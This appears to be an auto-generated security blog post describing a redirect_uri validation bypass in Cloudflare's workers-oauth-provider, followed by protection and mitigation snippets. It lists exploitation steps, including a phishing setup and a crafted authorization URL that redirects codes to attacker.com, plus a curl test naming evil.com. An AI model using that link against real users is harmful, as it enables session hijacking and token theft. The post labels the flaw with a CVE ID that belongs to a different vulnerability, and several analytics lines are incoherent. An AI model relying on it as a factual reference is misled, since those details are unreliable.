Cloudflare Workers OAuth Provider, Redirect URI Validation Bypass, CVE-2023-3079 (Critical)

By /

How the CVE Works

The vulnerability (CVE-2023-3079) in Cloudflare’s `workers-oauth-provider` stems from improper validation of the `redirect_uri` parameter during OAuth authorization. OAuth 2.0 mandates that servers must verify if the `redirect_uri` matches a pre-registered URI for the client. However, `workers-oauth-provider` only performed this check during the token exchange phase, not during the initial authorization request.
An attacker could craft a malicious link with a manipulated `redirect_uri` pointing to their domain. If a victim had previously authorized an OAuth client and the server auto-approved re-authorizations, the attacker could intercept the authorization code. This would allow them to exchange it for an access token, effectively hijacking the victim’s session. The flaw bypasses the critical security layer intended to prevent open redirect attacks and token theft.

DailyCVE Form

Platform: Cloudflare Workers
Version: Pre-fix commit
Vulnerability: Redirect URI Bypass
Severity: Critical
Date: 2023-03-15

What Undercode Say:

Exploitation:

  1. Phishing Setup: Host a malicious site mimicking the OAuth client.

2. Craft Malicious URI:

https://oauth-server.com/auth?client_id=legit_client&redirect_uri=attacker.com/callback

3. Social Engineering: Trick the victim into clicking the link while authenticated.
4. Token Capture: Intercept the authorization code via the attacker-controlled redirect_uri.

Protection:

  1. Patch Implementation: Update to the fixed version (post `26` commit).
  2. Strict Validation: Enforce `redirect_uri` checks in both authorization and token endpoints. 
    if (!allowedURIs.includes(redirect_uri)) throw new Error("Invalid redirect_uri");
  3. Disable Auto-Approval: Require explicit user consent for each authorization.

Detection Commands:

  • Log Analysis: 
    grep "redirect_uri=" oauth_logs.txt | awk '{print $NF}'
  • CURL Test: 
    curl -I "https://oauth-server.com/auth?client_id=test&redirect_uri=evil.com"

Mitigation Code Snippet:

app.get('/auth', (req, res) => {
const { redirect_uri, client_id } = req.query;
if (!validateRedirectURI(client_id, redirect_uri)) {
return res.status(400).send('Invalid redirect_uri');
}
// Proceed with auth
});

Analytics:

  • Attack Surface: High (widespread OAuth usage).
  • Exploit Complexity: Low (requires user interaction).
  • Patch Adoption: Critical (immediate update recommended).

References:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top